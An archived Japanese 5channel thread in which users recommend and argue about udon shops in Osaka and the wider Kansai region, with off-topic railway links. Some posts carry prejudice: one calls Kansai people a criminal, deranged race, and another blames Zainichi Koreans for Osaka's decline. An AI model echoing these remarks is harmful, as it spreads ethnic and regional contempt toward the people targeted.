5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【関西】( ゚Д゚)ウマー なうどん店情報キボソ【大阪】

1 :名無しさん@お腹いっぱい。:2005/09/06(火) 03:51:58 ID:ZoSv784O
関西でおいしいうどんを出すお店を教えてください


2 :名無しさん@お腹いっぱい。:2005/09/06(火) 04:04:21 ID:9tliXSd/
糞スレにつき

―――――――― 糸冬  了 ―――――――― 

3 :名無しさん@お腹いっぱい。:2005/09/06(火) 07:21:55 ID:34ZS2gbF
俺は宗右衛門町のはずれの「つるとんたん」がお勧め。
味も豊富なメニューも申し分ないが、ビジュアル的に楽しめるのも乙

4 :名無しさん@お腹いっぱい。:2005/09/06(火) 15:16:37 ID:ZoSv784O
>>3
情報dです
今度行ってみまふ

5 :名無しさん@お腹いっぱい。:2005/09/06(火) 15:21:03 ID:Ck6CeoIs
つるとんたん、なんて有名な店を出す意味がわかんない。
検索したりぐぐったりしたら3秒で見つかるのに。

よって>>2に同意。

6 :名無しさん@お腹いっぱい。:2005/09/06(火) 15:57:29 ID:nI+Obqis
重複終了

7 :名無しさん@お腹いっぱい。:2005/09/06(火) 22:09:19 ID:34ZS2gbF
>>5-6
大変だね、嫌阪厨は。

そんなに必死で人を叩くより、自分達の街の食文化を楽しんでみなよ。
楽しいぜ。




まあ、自分の部屋から出られる度胸があればだがなw

8 :名無しさん@お腹いっぱい。:2005/09/06(火) 23:25:17 ID:ZoSv784O
なんか変な方向に行ってますけど・・・
いや俺も嫌阪なんですけどね

でも、たまにはうどん食べたいかなーって思ったので
こういうとこで聞いたほうがコアな情報入るカナと思って立ててしまいました


9 :名無しさん@お腹いっぱい。:2005/09/06(火) 23:36:01 ID:34ZS2gbF
>>8
残念だが2ちゃんじゃ無理だろw
嫌阪厨のキモイ粘着のおかげで本物の関西人は絶滅状態だしなw
偽者の「関西やけど」みたいな卑怯者や「でいし厨」みたいな馬鹿はいるがw

10 :名無しさん@お腹いっぱい。:2005/09/06(火) 23:39:32 ID:ZoSv784O
すんません
でいし厨ってわかりません

まあそれはいいとして
というか、自分もネットで大阪氏ねとか言ってるんですけどね
うどんも年に1回食べるか食べないかだし
ただ、急に無性に食べたくなったんです
有名店も行こうとは思うのですが、玄人好みの店にも行けたらいいなーと思いました

11 :名無しさん@お腹いっぱい。:2005/09/07(水) 00:03:20 ID:3fJZSk5a
>>10
玄人なんて臭い言葉が通用しないのが大阪。

まあ、ブランド厨には理解できまいがなw

12 :名無しさん@お腹いっぱい。:2005/09/07(水) 03:46:26 ID:AH/EA1BP
どういう意味?前段

13 :名無しさん@お腹いっぱい。:2005/09/07(水) 07:47:13 ID:3fJZSk5a
>>12
知ったかぶりは嫌われるてことさ

14 :名無しさん@お腹いっぱい。:2005/09/08(木) 06:35:34 ID:i/mPMJfQ
ここは、Part3ってことでいいのか?

◆過去スレ
☆☆うどんについて語ろう 関西編 Part2☆☆
http://food6.2ch.net/test/read.cgi/jnoodle/1059320779/
 ミラー ttp://makimo.to/2ch/food6_jnoodle/1059/1059320779.html
☆☆うどんについて語ろう 関西編☆☆
http://food3.2ch.net/gurume/kako/1044/10448/1044886982.html

15 :名無しさん@お腹いっぱい。:2005/09/10(土) 05:48:33 ID:maqCTWE6
行列できてるみたいで萎えた
そこまでしてうどん食いたいとは思わぬ

16 :名無しさん@そうだ選挙に行こう:2005/09/10(土) 18:41:51 ID:aBe877cL
行列してまで物を食わないのが関西人


17 :名無しさん@そうだ選挙に行こう:2005/09/10(土) 23:58:35 ID:3bfyXZ4S
うわっ何だかカッコワルイ。

18 :名無しさん@そうだ選挙に行こう:2005/09/11(日) 08:46:27 ID:dlH06ZP5
行列に並ぶとかっこいいのか?ww
自分も行列とかならぶきにならない


19 :93:2005/09/24(土) 20:37:21 ID:wzJ2DPyG
茨木の唐庵がくそうまいらしい

20 :名無しさん@お腹いっぱい。:2005/09/25(日) 23:05:34 ID:NcoBAK09
>>19
唐庵はお勧め。
看板メニューは釜揚げだが、俺は冷やし系が好きだ。
しっかりしたコシがある上に上品な歯ざわりの麺は極上だと思う。
余談だがおでんもなかなか旨い

21 :名無しさん@お腹いっぱい。:2005/10/05(水) 21:25:02 ID:RoOZSaDx
東心斎橋の河福
かき揚げ系が充実
どんぶりを口元へ持ってきて
ツユをすする前に
湯気を吸い込んだだけで
胃の腑がじわぁっと
あったかくなってくるのは
ここだけ





22 :名無しさん@お腹いっぱい。:2005/10/06(木) 00:39:41 ID:F+84BXOJ
この板は凄い大阪のうどんに対する嫉妬で満ち溢れてるな
普通に全国一位は大阪か讃岐のうどんだろう

あの薄味はほんとうにたまらない、特に女性には大人気だね

23 :名無しさん@お腹いっぱい。:2005/10/07(金) 03:09:03 ID:MXxw43c1
>>22のような超味覚障害者に「大阪」と一緒にされてしまった「讃岐」が気の毒でなりません。

24 :名無しさん@お腹いっぱい。:2005/10/08(土) 03:26:57 ID:HBAZvt0B
>>23のような、立ち食いうどんやそこらのおばちゃんがやってるような
いい加減な店しか食べたことのないアホには、大阪のうどんの味わいは理解
出来ないね
それとも君の田舎にはたいして獲り得がないから、うどんだけで大阪に対抗
でもしたいの?リアルでは全国的に人気が1番なんだよ

25 :名無しさん@お腹いっぱい。:2005/10/08(土) 03:28:39 ID:HBAZvt0B
ちゃんとした店のうどんはダシだけじゃなく麺も違う
細めん 若干腰の効いた麺(讃岐ほどじゃないが)

26 :名無しさん@お腹いっぱい。:2005/10/08(土) 10:38:39 ID:pSRuaJBa
>>20
詳細を!!

27 :名無しさん@お腹いっぱい。:2005/10/08(土) 11:32:58 ID:58sHHFYB
関西 = 犯罪あたり前のキチガイ・ヘンタイ民族


連続発砲、覚せい剤で容疑者逮捕…関与認める
http://headlines.yahoo.co.jp/hl?a=20051007-00000111-yom-soci
http://www.yomiuri.co.jp/national/news/20051007i111.htm

 和歌山、大阪両府県の高速道路で発生した連続発砲事件で、別の覚せい剤取締法
違反(所持)容疑で逮捕された住所不定、無職上園健司容疑者(25)が府警の
調べに対し、和歌山、大阪での発砲を自供、和歌山事件ついて「前の車が遅いのに
腹が立ち、エアガンで撃った」と供述していることが、7日わかった。

 府警は和歌山県警と連携し、近く和歌山事件の器物損壊容疑で再逮捕し、一連の
発砲事件の全容解明を進める。

 上園容疑者は和歌山事件について、盗難車のクラウンに遊び仲間3人を乗せて
運転し、阪和道をドライブ中に改造エアガンを発砲したと認めている。発砲の動機
について「前の車にブレーキを踏まれて腹が立った」、「トンネルの中でとろとろ
走っていたのでいらだった」などと供述。「すべて自分一人で撃った」といい、
大阪府吹田市の路上に放置されていた犯行車両のクラウンについても「自分が乗り
捨てた」と認めているという。

 同種のエアガン発砲事件は、阪神高速道路で8月1日、9月12日、同27日に
連続して起きるなど、7月以降だけで大阪府内で約20件発生。うち8件の現場で
銀色のアリストが目撃されており、上園容疑者は「大阪でもやった」と供述して
いる。

 この一連の事件で、府警は改造エアガン計7丁を押収。犯行に使われたのは、
殺傷能力を備えるほど威力を高めたもので、両府県警は、銃刀法違反での立件も
検討している。

(2005年10月8日3時5分 読売新聞)

28 :名無しさん@お腹いっぱい。:2005/10/08(土) 17:04:55 ID:wCTcqrtd
なか卯

29 :名無しさん@お腹いっぱい。:2005/10/22(土) 03:16:05 ID:3QhDEcDx
堺筋線北浜駅そばの麺坊って店が好きだな。麺は腰があるし、野菜てんかす
やらゴマやらネギやら生姜やらがテーブルにのってて入れ放題。お勧めは肉
うどん。めちゃくちゃウマー。他のも食いたいのだがついつい肉うどんを頼
んでしまう…。ただし定食で1,050円。でもその価値は絶対あるね。

30 :名無しさん@お腹いっぱい。:2005/10/24(月) 22:57:24 ID:goBNNB9D
讃岐うどんにシコシコで負け
稲庭うどんに喉越しで負け
関東うどんには食べ応えで及ばない
唯一もちもち感でしか主張できない大阪うどん

大阪のうどん?あれは具ただの具
つゆが主役なんだからうどんはすっこんでろ、とな
 

・・・あ、つゆじゃなくて汁or出汁だっけw




31 :名無しさん@お腹いっぱい。:2005/10/24(月) 23:28:55 ID:ChJlTONo
ついつい千日前のCoCo壱カレーうどん食っちまった

32 :名無しさん@お腹いっぱい。:2005/10/24(月) 23:29:45 ID:goBNNB9D
たこ焼き、お好み焼き。熱いうちは食べられるけど
冷めると単なる廃棄物。
うどん、そば。だしに手間隙掛けてないので、塩味
でごまかす。
ほんと、大阪人には味覚あるんだろうかね?



33 :名無しさん@お腹いっぱい。:2005/10/24(月) 23:40:17 ID:dJEq4FyA
>>32
コピペ乙

今度は自分が狭い世界だけでしか生きれないヒキコモリでないことを訴えられるものを
書き込めるようになることを祈るよwww
まあ、それまでは頑張って狭い世界で引きこもっていてくれたまえ。迷惑だからwww

34 :名無しさん@お腹いっぱい。:2005/11/08(火) 23:57:55 ID:wP05aJwG
>>32
マジレス。
会津屋系のたこ焼きは、冷めてもおいしく食べられる。

35 :名無しさん@お腹いっぱい。:2005/11/09(水) 05:55:16 ID:IyfEc1uC
「食べ応え」って何だろう?
馬鹿は不思議な表現をするものだ

36 :名無しさん@お腹いっぱい。:2005/11/09(水) 08:40:10 ID:yVPdu9yO
関東人にとっては耐え難い現実→【大阪が日本を支えている】
http://news18.2ch.net/test/read.cgi/news2/1115224200/l50

37 :名無しさん@お腹いっぱい。:2005/11/11(金) 22:56:17 ID:IcPTnL1V
59 :名無し野電車区 :2005/11/09(水) 16:29:04 ID:QdPzfEut

ついにこの時が来てしまいますた
http://warheads.s5.xrea.com/b_img777/7684.jpg
http://warheads.s5.xrea.com/b_img777/7685.jpg

38 :名無しさん@お腹いっぱい。:2005/11/11(金) 23:41:43 ID:HX4a8hEl
やっぱ大阪には

「安い」はあっても


「美味い」はないんだな


39 :名無しさん@お腹いっぱい。:2005/11/12(土) 11:31:13 ID:v/tuJKJZ
なんばの新歌舞伎座ウラの「源氏」というお店。
場所がらか、食べに来た芸能人のサイン色紙なんかも飾ってあって
隠れた名店的な感じ。鍋風うどんがうまかった。

40 :名無しさん@お腹いっぱい。:2005/11/12(土) 12:18:12 ID:rlabAf6U
讃岐(香川)・武蔵野(東京)・稲庭(秋田)・桐生(群馬)のうどんは文句無しに美味い。

大阪・博多は論外


41 :名無しさん@お腹いっぱい。:2005/11/13(日) 00:07:21 ID:3/5TrYaf
へんこつうどん

42 :名無しさん@お腹いっぱい。:2005/11/14(月) 20:35:10 ID:XG6O3iCj
「207系」電車塗色デザイン変更車両の営業運転開始
http://www.westjr.co.jp/news/newslist/article/051114c.html

43 :浦安市民:2005/11/15(火) 20:20:51 ID:IJHRZFRn
有名店で恐縮だが、梅田の「はがくれ」は丁度良いむっちりしたコシで、
好きなうどん屋。香川でも色々有名店で食ったが、なんつうか、ゴワゴ
ワしててあまり美味いとは思わなかったよー

44 :不味くても@お腹いっぱい。:2005/11/16(水) 13:07:53 ID:XuYLhtU2
>>32
粉物で冷めても旨い物ってどんな物?
教えてくれ、食べに行くから

手間隙かけたうえに塩分(醤油もだよ)少な目の出汁ってどんな物?
教えてくれ、食べに行くから

どこと比べてんだか知らないけど、
味覚の優れた地域ってどんな所?
きっと優れた郷土料理があるんだろう?
教えてくれ、食べに行くから

45 :名無しさん@お腹いっぱい。:2005/11/16(水) 23:23:48 ID:f2w3ckDA
こんなスレで絶対紹介したくない。
店の格が落ちるし、こんなとこの住人には来て欲しくないんで
絶対教えない。お店も迷惑だろうし。

46 :名無しさん@お腹いっぱい。:2005/11/16(水) 23:30:43 ID:/OR5dkm3
「ビエラ福知山」がオープン!!
http://www.westjr.co.jp/news/newslist/article/051114d.html

47 :名無しさん@お腹いっぱい。:2005/11/18(金) 02:17:38 ID:ewoC/7XR
枚方南中振の「いっちょう」は間違いなく須山の「かませい」より上だ。

48 :名無しさん@お腹いっぱい。:2005/11/21(月) 21:38:51 ID:oTYjF8mm
「321系」通勤形車両の営業運転開始
http://www.westjr.co.jp/news/newslist/article/051121a.html

49 :名無しさん@お腹いっぱい。:2005/11/23(水) 17:32:40 ID:hBhRZklJ
大阪うどんベスト5
・カスうどん  天6 天神橋筋沿い
・つけ鴨うどん 大国町 パチンコアローの近く
・讃岐うどん 緑橋近く中央大通り沿い
・讃岐うどん 天神橋商店街と2号線が交差してる近く
・こんぴらうどん 尼崎商店街の中
全部店名適当

50 :名無しさん@お腹いっぱい。:2005/11/25(金) 22:13:40 ID:keM/ddaP
色変更「207系」走る 脱線事故の遺族らに配慮
http://headlines.yahoo.co.jp/hl?a=20051125-00000039-kyodo-soci

51 :名無しさん@お腹いっぱい。:2005/11/26(土) 11:03:58 ID:RAGPCwuI
鉄ヲタ市ね

52 :名無しさん@お腹いっぱい。:2005/11/27(日) 00:06:11 ID:PmsT3NEN
つるとんたんの、おうどんが好きですo(^-^)o

53 :名無しさん@お腹いっぱい。:2005/12/05(月) 16:15:04 ID:3avbdB6D
天六のうどん屋さんは《うどん道場》だよ。カスうどん美味いよね。

54 :名無しさん@お腹いっぱい。:2005/12/06(火) 09:07:54 ID:oOnEobfI
大阪に続々とデビューする超高層ビル

http://osaka2005.hp.infoseek.co.jp/tower.html

55 :かけだし:2005/12/19(月) 20:52:13 ID:KE65k5v9
情報があればお願いします!
場所は堺市中百舌鳥近辺のジャリ駐車場で小屋みたいな建物(現在はボーリング場?前)、時期は4〜5年前に最後行った、夜から深夜までの営業、オジサンオバサン2人で通い営業。
めちゃ美味かったあの店が今はもう無いみたいなんです…どこか別の所へ移転したんでしょうか?
知っている方がいれば是非教えてください!

56 :名無しさん@お腹いっぱい。:2005/12/23(金) 21:43:04 ID:ds8GDRz8
寝屋川の国道163号(多分)沿いにある、おいしいうどん屋にもう一度
行きたいのですが、店の名前と、正確な場所がわかりません。

手がかりは、
・道路沿い
・うどんの量がめちゃおおい
・肉とてんぷらを入れたうどんを頼むと、1800円ぐらいだったような気が
・魔法のレストランで取り上げられたことがある。

情報もっているかたおられたら、提供よろしくお願いします。

57 :名無しさん@お腹いっぱい。:2005/12/23(金) 22:26:58 ID:D/ZPqZns
>56
饂飩倉ですな…。
R163沿いにあります。
住所的には門真市になると思う。
検索すれば、正確な住所とか出ると思うよ。




58 :名無しさん@お腹いっぱい。:2005/12/23(金) 23:07:32 ID:yxzb8EgM
>>57
ありがとうございます!
早速探してみます。


59 :川ちゃん:2005/12/26(月) 16:55:00 ID:8uafhEVk
大阪の阪急庄内駅を降りて歩いて15分ぐらいの所に24時間営業の五色風呂って銭湯で販売してる、うどんは激ウマですよ。月見、きつね、天ぷら、わかめ、エトセトラ全てのメニューが同じ値段の380円でオススメは肉うどんでうどん食べるだけでもokで超美味しいよ

60 :名無しさん@お腹いっぱい。:2005/12/30(金) 23:00:45 ID:iGEq1AD2
なんば新歌舞伎座うらの源氏かな

61 :名無しさん@お腹いっぱい。:2005/12/30(金) 23:32:29 ID:gDBNKeLo
49>尼崎は大阪じゃないだろ

62 :名無しさん@お腹いっぱい。:2005/12/31(土) 18:39:12 ID:6BcMcwnO
市外局番は06だけどな<尼

63 :名無しさん@お腹いっぱい。:2006/01/09(月) 02:41:36 ID:XBzmIfrn
元町に先月オープンした『民芸』激ウマ( ̄□ ̄;)!!久しぶりに、うまいうどん屋見つけた!

64 :名無しさん@お腹いっぱい。:2006/01/09(月) 04:02:12 ID:goYlP7Z+
ttp://plaza.rakuten.co.jp/nekomaman/diary/200512130001/

65 :名無しさん@お腹いっぱい。:2006/01/13(金) 22:48:06 ID:fAWpgdVd
道頓堀周辺は大体うまいね。

66 :名無しさん@お腹いっぱい。:2006/01/14(土) 09:33:23 ID:NKUPKfQs
讃岐うどんなんか不味いからどうでも良いよ
硬くて粉臭いだけだろ 、、、プププププ

67 :名無しさん@お腹いっぱい。:2006/01/19(木) 20:50:08 ID:h6kqgQJR
汁まで全部飲みたくなる大阪のうどん

68 :名無しさん@お腹いっぱい。:2006/01/22(日) 13:30:31 ID:v1Rv6wX9
江坂にある"麦まる"はお出しが美味しいです。

69 :めん食い:2006/01/22(日) 13:48:17 ID:v1Rv6wX9
最近かすうどんにはまって色々食べ歩いてるんだけど、めちゃヒットは本町のうつぼ公園横
にあるかすうどん屋さん。
かすもいい味だし、汁も最高!一押しですね。名前忘れちゃった。。けど、おでんもやってることろ。


70 :名無しさん@お腹いっぱい。:2006/01/22(日) 17:12:28 ID:KQk7KEYe
JR新今宮駅高架下にある、ホルモンうどんってどうよ?

71 :名無しさん@お腹いっぱい。:2006/01/22(日) 19:42:28 ID:vn76T0Ts
大阪のうどんまずい…食った店が悪かったのか…

72 :名無しさん@お腹いっぱい。:2006/01/22(日) 19:46:28 ID:KQk7KEYe
>>71
どうまずかった?
それによって、店が悪いか口に合わないか判る。

73 :名無しさん@お腹いっぱい。:2006/01/22(日) 21:50:44 ID:vn76T0Ts
麺がのびてたし(*_*)ダシもぬるかった。確かに流行ってる店ではなかったけどね
トラウマですw

74 :名無しさん@お腹いっぱい。:2006/01/22(日) 22:16:14 ID:KQk7KEYe
>>73
駅の立ち食いの方がマシだったかもね。

75 :名無しさん@お腹いっぱい。:2006/01/22(日) 22:27:33 ID:m8G5/O2P
難波駅近くの松屋はどうですか?

76 :名無しさん@お腹いっぱい。:2006/01/23(月) 19:13:48 ID:3MX+gfBD
京阪中書島駅内の比叡

77 :名無しさん@お腹いっぱい。:2006/01/24(火) 00:47:44 ID:vdsOyuJv
ヒマな方はどうぞ(・∀・)つ   ttp://omosiro-movie.sakura.ne.jp/

78 :名無しさん@お腹いっぱい。:2006/02/05(日) 01:19:43 ID:bqZKAHEh
十三のカプセルホテル・シャンのカレーうどん。
病みつきになる奇跡の味。

79 :名無しだよ!:2006/02/05(日) 23:17:24 ID:WFyjpG8Q
質問です?
名物の悪名高い【大阪の臭い水道水】(大坂府承知)
まさか、その水道水でうどんを作りませんよね!
食い物商売はミネラルウォータですよね?
安心して水曜日の大阪出張に行きたいので

80 :名無しさん@お腹いっぱい。:2006/02/06(月) 17:40:24 ID:HGtk7WG9
>>79
荒川・利根川系のマズイ水で慣らしおけば無問題

81 :名無しさん@お腹いっぱい。:2006/02/06(月) 17:41:04 ID:HGtk7WG9
× 慣らしおけば
○ 慣らしておけば

82 :名無しさん@お腹いっぱい。:2006/02/14(火) 23:57:03 ID:Sj7+FP0x
中央区東平の皐月庵、肉うどんむっちゃおいしい。

83 :名無しさん@お腹いっぱい。:2006/02/15(水) 21:29:58 ID:7rTFiRpe
数年前から大阪の水は
オゾン処理で臭くないです



84 :名無しさん@お腹いっぱい。:2006/02/16(木) 02:10:51 ID:UaDIvN+C
>>69
東住吉のうどん道場をもう少し行って右斜線にある小さな屋台が一番おいしいよ!!。
かすうどん650円。かすはスライスじゃないブツ切りのゴロゴロでもちろんかすうどんにかかせない昆布、ゆず入り。
天かす、青ねぎ、白ねぎ入れ放題。
おやっさんの気分次第では肉もサービスしてくれる。
おすすめの時間帯は閉店間近でおやっさんも酔ってる3時前くらいがベスト。
欠点はおやっさんの気分次第で屋台を出しているため営業時間や曜日にばらつきがあります。
毎月1日がお酒半額、11日がうどん半額、21日がおでん半額です。

二番目が大和川手前にある麺屋金蔵のかすうどん
500円でかす大盛りがプラス100円。かすだけでははここが歯ごたえがあり一番です。

3位は藤井寺のかすやです。かすが冷凍で生臭く、あたたまりきっていない時もあります。ゆず、昆布なし。(トッピングしなくてはいけません)
ここが3位なのは僕も10軒以上かすうどん屋を巡りましたが、その他がまずすぎるからです。

85 :名無しさん@お腹いっぱい。:2006/02/18(土) 03:28:08 ID:2Ltcp/d8
>>84
かすうどんスレにも書き込んだけど、堺、方違い神社付近の「ぶんぶく」もお勧めです。
ざるうどんや熱盛りそばにも牛かすを入れてくれたり結構客のわがままも聞いてくれます。
俺はそばの方が好きだけど^^;

86 :名無しさん@お腹いっぱい。:2006/02/18(土) 04:16:20 ID:FYCtvvEF
上新庄の一心
おいしいっす

87 :大阪ドーム破綻:2006/02/18(土) 23:30:00 ID:fpOd5HPQ
それは良いですね

88 :名無しさん@お腹いっぱい。:2006/02/23(木) 21:59:46 ID:kIgmLsdV
ビックカメラの横の『天政』の肉うどんの肉の量が多いから好きです(*^_^*)

89 :名無しさん@お腹いっぱい。:2006/02/23(木) 23:43:16 ID:71XUxLju
関西テレビ24日0:35〜1:30
梅田貨物駅・紆余曲折空白の15年

90 :カレうどん〜大好き:2006/02/24(金) 01:37:52 ID:pSQy4nzU
私、「かませい」本当に大好きで何回もいっています。飽きないあじです。味うま、特に量が気に入っています。vvv6でもカレ-うどんやってるときあるけどあの量でこんな高い値段かよって超思う。。。(東京だし仕方ないかァ)

91 :名無しさん@お腹いっぱい。:2006/02/24(金) 02:06:03 ID:i+3UEGNh
姫路駅構内の駅そばって美味くないっすか??めちゃ好きです

92 :うどんくん:2006/02/25(土) 02:21:46 ID:/ZWg+Tl9
茨木の唐庵

93 :名無しさん@お腹いっぱい。:2006/02/25(土) 08:54:02 ID:TnG5Fwl+
ああ。おれもだ。
五色温泉のうどん食って
「こ、こんなトコのこんな値段のウドン食って、うまいとは」

とちょっとかなしくなったけど、うまい。

あと新千里北町の「も○づき」
ウドンもいいけど、親子丼がGJ。
長浜の「鳥○」と同じ系統だけど、長浜よりふんわりしてる。

好みもあるけど、アテは「も○づき」のほうが好き。

94 :名無しさん@お腹いっぱい。:2006/02/25(土) 22:31:30 ID:BU/a0mgm
心斎橋、西家のうどんすき
茨木商店街、たつみや

95 :名無しさん@お腹いっぱい。:2006/02/26(日) 09:59:48 ID:Ai2fWCoY
地下鉄の今里駅にある拾銭うどん!かすうどんおいしかったよ。

96 :名無しさん@お腹いっぱい。:2006/03/01(水) 22:22:39 ID:f/pp2II0
大阪で関東風のうどんのおいしい店はありますか?
もしくは、椎茸の出汁の入っていないうどんの店を紹介していただけると助かります。

うどん、たまに食べたくなりますが、
椎茸が生理的に受け付けられないくらいキライなので、なかなか注文する機会に恵まれません。
(関西風の出汁でも、椎茸の味が強くなければおいしく食べられるのですが)

関東風の鰹出汁と醤油のまろやかなツユが一番好きなのですが、
そばはともかくうどんの店となるとなかなか見つかりません。

もしよろしければ、ご紹介いただけると助かります。

97 :名無しさん@お腹いっぱい。:2006/03/02(木) 05:59:29 ID:bimhOhDa
あげ

98 :名無しさん@お腹いっぱい。:2006/03/02(木) 14:25:07 ID:Wyx5Xbrq
茨木の唐庵行ったよ。釜揚げ食った。確かにうどん自体はめちゃくちゃうまいけど、ダシが薄いような気がした。たぶんこれは個人の好み。
開店前からちらほら人が並んでた。開店数分ですぐいっぱいになったのはすごい!あの立地(茨木のはずれ?)であの人気はすごいな。

99 :名無しさん@お腹いっぱい。:2006/03/03(金) 06:55:56 ID:ESDsRT0e
西区で伊勢海老の天ぷらがあるうどん・そば屋ってどこかわかりませんか?

100 :カレうどん〜大好き:2006/03/04(土) 17:46:53 ID:dMN4DXwj
98さん行ったんですか〜私はあそこ行ったら絶対カレ-うどんなんですよ〜。私、行った時すっと入れた時なんかないかも。駐車場いつもいっぱいで少しまつんですけどね。。少し離れた所に駐車場あるじゃないですか人の家主の駐車場が一緒になってるから親が入れそうになるし。。

101 :名無しさん@お腹いっぱい。:2006/03/04(土) 20:46:33 ID:DxNphhL3
>>91
うまくもないがまずくもない。
常に作り置きしているので、こしがない。
昼の2時から5時までの値段が妥当。それ以外の時間は高過ぎる。

102 :名無しさん@お腹いっぱい。:2006/03/30(木) 23:11:04 ID:O+9pVWXC
新大阪駅にある杵屋のうどんが好き・・・うどんってあんまり店で食べたことないんだよな
立ち食いでチャッチャと食えるからそこがいい

麺は讃岐だけど切り方が雑だったな今回は。前はよかったけど。
で、好きなのがダシ。あのダシ汁どうやって作ってんの?
液体いりこダシとか、粉末いりこだし買って家で作ってみてもあーいう味のダシ汁にはならないんだよな
どうにか再現できないものかね・・・

103 :テロ:2006/03/31(金) 02:24:47 ID:okO6lpqi
関東から来たうどん屋発見!なんばパークス7階麺だらけの中にある「うどんキュイジーヌ」創作うどんやから変わったうどん多し!暇な奴おったら行ってみな

104 :名無しさん@お腹いっぱい。:2006/04/02(日) 21:45:37 ID:TF6AK9LU
富田林にある和久ってとこがおいしい。店の雰囲気も落ち着いてて
常連も多い。定食はすこし量が多いけど大食にはうれしい。

105 :名無しさん@お腹いっぱい。:2006/04/03(月) 00:30:29 ID:ezkhokip
大阪も美味いうどん屋が少なくなったねぇ。
田舎者とか在日がどんどん増えてっからだろうね・・・。
食い倒れの街も終わりかな。

106 :名無しさん@お腹いっぱい。:2006/04/06(木) 02:28:26 ID:QSYcgsE7
堺市中区八田の鹿児島は?

107 :名無しさん@お腹いっぱい。:2006/04/06(木) 12:46:25 ID:cmbSj/+Y

ずっと昔から大阪は食い倒れの街として、食において一流の評価を得てきた。
それをまた嫉妬深い東京のマスメディアが面白くないもんだから
ぶち崩そうと始めたのが「大阪=タコ焼き」と印象付ける作戦。

テレビに大阪の街が出るたびにタコ焼きを映し、吉本のテーマ曲と食い倒れ人形も
合わせた3点セット映像を繰り返し、繰り返し、流しては日本中にそのイメージを
植え付けてしまった。

本来の大阪は、てっちり、すき焼き、寿司、焼肉、うどん等あらゆる食において
一流であるのだが、テレビの執拗な 「 タ コ 焼 き 作 戦 」 によって
記憶から消し去られようとしている。


108 :名無しさん@お腹いっぱい。:2006/04/08(土) 10:58:26 ID:Y+09VxsU
うどん工房らん、日休、11〜15営。
環状線美章園下車、東住吉区桑津住宅街にひっそりと。
生じょうゆうどん(冷温とも)、一度ご賞味を。
探すのは大変ですが、苦労して探すだけの価値は十分。

109 :名無しさん@お腹いっぱい。:2006/04/08(土) 11:06:12 ID:Y+09VxsU
環状線ではなく、阪和線です。間違いました。すみません。

110 :名無しさん@お腹いっぱい。:2006/04/08(土) 23:48:31 ID:Wk9bHKS2
JR西、通勤電車を固定窓から開閉窓へ「回帰」
http://www.asahi.com/kansai/news/OSK200604080041.html

111 :名無しさん@お腹いっぱい。:2006/04/10(月) 19:46:59 ID:yWgH1qe/
寝屋川なら凡蔵は?
あんなコシは本場でも食べたことない。

112 :名無しさん@お腹いっぱい。:2006/04/20(木) 10:42:22 ID:PXsZYLCN
夢の「琵琶湖環状線」今秋実現 京阪神から湖北へ直通電車
http://www.kyoto-np.co.jp/article.php?mid=P2006041900237&genre=A2&area=S00

113 :名無しさん@お腹いっぱい。:2006/04/20(木) 11:19:55 ID:Axwz5UeT
>>106
鹿児島は美味しいけどしょっちゅう食べれる店ではないな。
深井の好喜心だっけ?が気になる。出前のバイクをたまに見るんだが店がどこにあるのかが解らない。
美味しいかな?

114 :名無しさん@お腹いっぱい。:2006/04/21(金) 01:43:18 ID:Znu4F3R0
四国からきた俺からしたら大阪に美味しいうどん屋なんて無い。


115 :名無しさん@お腹いっぱい。:2006/04/23(日) 11:40:03 ID:0gOB230t
枚方の釜盛が旨い
最初ランチを頼んで喰ったけどあまり旨いと思わなかった
しかし天ぷらうどんを頼んで評価が急上昇した


116 :名無しさん@お腹いっぱい。:2006/04/24(月) 14:32:46 ID:hgr5nLR6






    .r'ー、                .r'ー、        ._
  .,,l゙゙゙ll ○ .l    l ̄ ̄ ̄ ̄l   l. ○.゙ll゙゙゙l,,     .l l′
 ,l゙゙.,l゙’`'ー''    | l ̄ ̄i .l   .`'ー'' ゙ヽ .l,、 __l l_  ,---------i
.,l゜,l°       .l .l:   l .l       ゙l, ゙l  | .___.゙゙l '------'i  ,l
.l l         .l .l   .| .l        l l | .l    .l 「  _, .,r'゙.,,l" ,---------,
.l l           ,l ,l   | .l       ,l l ,| ,l   ,l ,l  .l  l゙ .,,r'  '---------'
.'l, 'l,          ,l゙ .,l    .| .l         ,l`,l゜ ゙ ̄   ,l゙ .,l   ゙゙l,, . l
. ゙l .゙l,、    .,,,l゙ l----- l .`┓    .,,.l",l゙     .,,l’.,l゙`    l, ゙l,
  ゙l,,.゙┓    l  ,--------i, .l    ,l゙゚,,l″    .l゙` ,,l       ̄
    ̄    .l_l      :l_.l     ̄゜       ̄

















117 :名無しさん@お腹いっぱい。:2006/04/25(火) 16:03:47 ID:5PzA35oN
梅田の「はがくれ」より美味しい店あるの?

118 :名無しさん@お腹いっぱい。:2006/04/25(火) 21:56:14 ID:WwWMyOx5
ある。

119 :名無しさん@お腹いっぱい。:2006/05/02(火) 14:56:58 ID:nCe26TQS
はがくれはアレコレうるさすぎる。
静かに食えるところの方がいい。

120 :名無しさん@お腹いっぱい。:2006/05/02(火) 16:04:33 ID:nuFIGlK7
讃岐のコシと大阪の出汁の両方が融合したお店は無いのでしょうか?
あれば教えてください。


121 :名無しさん@お腹いっぱい。:2006/05/02(火) 20:16:43 ID:h6hDigdB
西宮の「はがくれ」よりは、西宮の「梅八」の方が旨い。

122 :名無しさん@お腹いっぱい。:2006/05/03(水) 00:04:37 ID:R76WV2ZL
>>120
難波の釜たけはどうだろう。
きつねとかはまさにあんたが求める物だったと思う。

123 :名無しさん@お腹いっぱい。:2006/05/07(日) 00:23:51 ID:1/e3oS60
堺で深夜12時くらいまでやってる旨いうどん屋知りませんか?

124 :名無しさん@お腹いっぱい。:2006/05/07(日) 16:55:54 ID:hL6WxPwF
>>117
大阪駅前第3ビル地下一階の「めん次郎」

125 :名無しさん@お腹いっぱい。:2006/05/09(火) 18:28:37 ID:Dd/zqLn5
>>123
鳳と高石の間ぐらいになるが26号線を南に向かって走って左側に隆慎っていう
トコはうまかったぞ。

126 :名無しさん@お腹いっぱい。:2006/05/11(木) 00:52:44 ID:AQkKI/f0
1 名無しさん@お腹いっぱい。  2005/09/06(火) 03:51:58 ID:ZoSv784O
関西でおいしいうどんを出すお店を教えてください

8 名無しさん@お腹いっぱい。  2005/09/06(火) 23:25:17 ID:ZoSv784O
なんか変な方向に行ってますけど・・・
いや俺も嫌阪なんですけどね
でも、たまにはうどん食べたいかなーって思ったので
